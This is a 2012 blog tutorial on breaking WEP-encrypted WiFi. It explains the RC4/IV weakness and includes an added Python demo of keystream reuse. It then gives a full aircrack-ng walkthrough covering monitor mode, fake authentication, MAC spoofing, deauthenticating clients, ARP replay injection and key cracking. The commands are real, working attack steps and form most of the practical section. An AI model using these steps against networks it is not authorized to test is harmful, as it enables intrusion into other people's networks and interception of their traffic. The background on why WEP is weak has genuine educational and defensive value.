Saturday, 10 March 2012

How To Crack WiFi WEP With Packet Injection


Intro

By now most people have wireless networks at home. A lot of them have either had their bandwidth leeched by neighbours or leeched through someone else's open network themselves. The obvious fix is to encrypt your network traffic, and one of the available methods is WEP, or Wired Equivalent Privacy. I’m going to talk about why you shouldn’t use WEP and how easy it is to crack.


Background

WEP was designed to give a wireless user roughly the privacy they would have on a wired LAN. It uses the RC4 stream cipher with what is marketed as a 64-bit or 128-bit key. 24 bits of that key are a per-packet IV (initialization vector), which is meant to make every packet encrypt under a different RC4 seed. Only the remaining bits are the static shared key you actually configure, so the real key strength is 40 or 104 bits.

How it works

The transmitting station prepends the 24-bit IV to the shared key to form the RC4 seed. RC4 acts as the PRNG: it expands the seed into a stream of pseudo-random bytes (the keystream). The station also computes a CRC-32 integrity check value (ICV) over the plaintext. The plaintext plus ICV is XORed byte-for-byte with the keystream to produce the cipher text. The frame then goes out over the air with the IV (and a key-ID byte) in the clear in front of the cipher text, and with the Protected Frame bit set in the 802.11 header to mark it as encrypted. The receiving station sees that bit, reads the clear-text IV, attaches it to its copy of the shared key, runs RC4 to regenerate the identical keystream, XORs it against the cipher text to get the plaintext and ICV back, and checks the CRC-32.

What’s the problem?

The problem is that, for efficiency, the IV is only 24 bits. That gives just 2^24 (about 16.7 million) distinct seeds per shared key, and many cards choose IVs badly (counting up from zero at every reset, or picking them at random, which by the birthday bound repeats after only a few thousand frames). Once an IV repeats, two frames share the same keystream: XOR the two cipher texts and you get the XOR of the two plaintexts, and because every data frame starts with a predictable LLC/SNAP header you get keystream bytes for free. Worse, RC4 leaks information about the secret key in the first bytes of keystream for certain IVs (the FMS attack and the later KoreK and PTW attacks), so collecting enough frames with distinct IVs recovers the shared key itself. A busy AP will cycle through the IV space in a few hours, and an attacker can be sitting and collecting data the whole time, or take a more aggressive approach and have all the IVs they need in a few minutes by use of packet injection.
The other downfall is that WEP only encrypts the frame body, not the entire frame. The 802.11 header (source and destination MACs, BSSID, frame type) stays in plain text, which is exactly what lets an attacker pick out the AP, its clients, and, by size, its ARP traffic.
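The following is an added example, not code from the original post: a toy model of the per-frame encryption described under "How it works" and of the IV-reuse problem described just above. RC4, the IV||key seed, the CRC-32 ICV and the key-ID byte follow the real WEP layout; the 40-bit key, the IVs and the frame contents are constructed for illustration. The demo encrypts an ARP frame and a second frame under the same IV, then recovers the second frame's prefix without ever knowing the key.

```python
# Added example (not from the original post): toy WEP encrypt/decrypt and
# a keystream-reuse attack. Key, IVs and frame contents are constructed.
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4: key-scheduling (KSA) then keystream generation (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Frame body as sent over the air: IV(3) | key-id byte | RC4(IV||key) XOR (plaintext||ICV).

    The ICV is CRC-32 of the plaintext; the seed is the IV prepended to the
    40- or 104-bit shared key."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("IV must be 3 bytes; key must be 5 (40-bit) or 13 (104-bit) bytes")
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    keystream = rc4_keystream(iv + key, len(plaintext) + 4)
    return iv + bytes([(key_id & 3) << 6]) + xor(plaintext + icv, keystream)


def wep_decrypt(key: bytes, body: bytes) -> bytes:
    """Receiver side: read the clear-text IV, rebuild the seed, XOR, verify the ICV."""
    iv, ct = body[:3], body[4:]
    pt_icv = xor(ct, rc4_keystream(iv + key, len(ct)))
    pt, icv = pt_icv[:-4], pt_icv[-4:]
    if struct.unpack("<I", icv)[0] != zlib.crc32(pt) & 0xFFFFFFFF:
        raise ValueError("ICV mismatch: wrong key or corrupted frame")
    return pt


def icv_ok(key: bytes, body: bytes) -> bool:
    """True if `body` decrypts under `key` with a matching ICV."""
    try:
        wep_decrypt(key, body)
        return True
    except ValueError:
        return False


# Every WEP data frame starts with an LLC/SNAP header, so the first plaintext
# bytes are predictable. That is the known plaintext the reuse attack needs.
SNAP_ARP = bytes.fromhex("aaaa030000000806")   # LLC/SNAP + EtherType ARP
SNAP_IP = bytes.fromhex("aaaa030000000800")    # LLC/SNAP + EtherType IPv4


def recover_keystream(body: bytes, known_plaintext: bytes) -> bytes:
    """Attacker: cipher text XOR known plaintext = keystream for this IV."""
    return xor(body[4:4 + len(known_plaintext)], known_plaintext)


def decrypt_other_frame(victim_body: bytes, reused_iv: bytes, keystream: bytes) -> bytes:
    """If the victim frame carries the same IV, the same keystream decrypts its prefix."""
    if victim_body[:3] != reused_iv:
        raise ValueError("IVs differ; this keystream does not apply")
    return xor(victim_body[4:4 + len(keystream)], keystream)


KEY = bytes.fromhex("0102030405")   # constructed 40-bit shared key
IV = bytes.fromhex("0b0c0d")        # constructed IV, reused below on purpose
# Constructed frames: an ARP request (fully predictable) and a secret IP frame.
ARP_FRAME = SNAP_ARP + bytes.fromhex("0001080006040001") + b"\x00" * 20
SECRET_FRAME = SNAP_IP + b"IP packet: GET /admin HTTP/1.0\r\n"


def demo() -> bytes:
    """Return the prefix of SECRET_FRAME recovered without KEY."""
    body_arp = wep_encrypt(KEY, IV, ARP_FRAME)
    body_secret = wep_encrypt(KEY, IV, SECRET_FRAME)   # same IV => same keystream
    ks = recover_keystream(body_arp, ARP_FRAME)        # attacker guessed the ARP frame
    return decrypt_other_frame(body_secret, IV, ks)    # == SECRET_FRAME[:len(ARP_FRAME)]


if __name__ == "__main__":
    print(demo())
```

The receiver's ICV check only catches a wrong key or a garbled frame; it does nothing against the attacker here, who never needs the key at all. Replaying a captured ARP frame (what aireplay-ng does later in this post) is just a way to make the AP emit many frames with fresh IVs quickly, so the statistical key-recovery attacks have enough material to work with.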

How is it done?

There are tools available that recover the key from a collection of IVs. It’s as easy as sitting around listening to network traffic and then running a program once you have enough data. That’s all there is to a passive attack.
Sitting around and waiting for a network to give you enough data by itself can take hours or even days. The process can be sped up to a matter of minutes by injecting the network with replayed packets. This is done by setting your wireless card to monitor mode, associating with the AP as if you were a legitimate client, and replaying captured ARP requests so the AP answers each one with a freshly encrypted frame.
The tool I am going to use in this example is the Aircrack-ng suite. It is an entire suite designed for testing and breaking through protections on a wireless network. I don’t suggest attempting to use this tool in a Windows environment; driver support for monitor mode and injection isn’t readily available there. I do recommend that Windows users take a look at the BackTrack Linux live environment, which ships the suite and patched drivers and can be run off portable media such as a DVD or flash drive.


Set your wireless card into monitor mode.

You need to have a wireless card whose driver supports monitor mode and packet injection. Monitor mode lets you capture every frame on the channel instead of only frames addressed to you. On Linux this is done by creating a virtual interface that acts as a second wireless adapter on the same hardware. The tool to automate this is airmon-ng. Please substitute your wireless interface accordingly in the following steps.

Take the interface down:

# ifconfig wlan0 down
Create the monitor-mode interface (airmon-ng prints the name of the new interface; this version calls it mon0, newer releases call it wlan0mon):
# airmon-ng start wlan0
If airmon-ng warns about processes such as NetworkManager or wpa_supplicant, stop them first (`airmon-ng check` lists them); otherwise they will keep resetting the channel or the interface under you.

Test injection capabilities:

# aireplay-ng -9 -e ESSID -a 00:11:22:33:44:55 mon0
  • -9 tells aireplay to test injection
  • -e is the ESSID of the AP
  • -a is the BSSID (MAC Address) of the AP
  • mon0 is my interface in monitor mode

Start grabbing IVs:

# airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w ESSID mon0
  • -c is the AP’s channel; without it airodump-ng keeps hopping channels and you miss most of the traffic
  • --bssid is the MAC Address of the AP
  • -w is the prefix for the capture files (written as ESSID-01.cap and so on); I normally use the ESSID
The #Data column is the count of data frames, which for WEP is essentially your IV count.
That’s all you need to do for a passive attack. Now we’ll speed up the process.

Authenticate with the AP:

One of these will work better than the other depending on your scenario. Choose what works best for you. In both, -h is the MAC address your card is actually transmitting with; the fake authentication only holds if the AP sees your injected frames coming from that address.
# aireplay-ng -1 0 -e ESSID -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0
# aireplay-ng -1 6000 -o 1 -q 10 -e ESSID -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0
The first authenticates once; the second re-authenticates every 6000 seconds, sends one packet per authentication (-o 1) and a keep-alive every 10 seconds (-q 10), which is what you want against APs that drop idle clients.
If neither of those works, MAC filtering may be configured and you will need to spoof your MAC to that of an existing client (take one from the client list airodump-ng shows). Then you can either move on to the next step masquerading while the client is still up, or send a deauthentication packet to that client and try the previous step again, or simply wait for the client to reauthenticate and send ARP packets. Here -c is the client being kicked:
# aireplay-ng -0 1 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0

Inject your packets:

Finally, you’re associated and not getting sent deauthentication packets. As long as you are associated the AP will respond to your packets. If you lose the association, just repeat the previous step. Now we’re going to start replaying ARP packets: aireplay-ng waits until it sees an ARP request from a real client on the network, then replays it over and over, and the AP answers every copy with a newly encrypted frame carrying a fresh IV. If no ARP request shows up, deauthenticating a client (previous step) usually provokes one when it reconnects. Watch the #Data column in airodump-ng climb.
# aireplay-ng -3 -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0

Crack your data:

Once you have about 20,000 IVs you can try to see if you can find the key; a 128-bit key typically needs somewhere between 40,000 and 85,000 with the default PTW attack. You can perform this step while still collecting IVs, and aircrack-ng will re-read the capture as it grows. First we’ll try to crack based on a 64-bit key (-n is the key length in bits). Replace ESSID with whatever you put for the -w parameter for airodump-ng previously.
# aircrack-ng -n 64 ESSID*.cap
If that doesn’t work we’ll try for a 128-bit key.
# aircrack-ng ESSID*.cap

Conclusion

The process to break through WEP can be completely automated and done in a very short period of time. Make sure you secure your network with something more secure. At the time of this article I use WPA2 with a RADIUS backend.
If you are trying this at home and can’t crack it right away don’t get discouraged. It once took me over 2 million IVs to break into my home network. It’s all a matter of luck when it comes down to the aircrack-ng step.


All Rights Reserved Walk With-[Geeks]- by w4r-b0y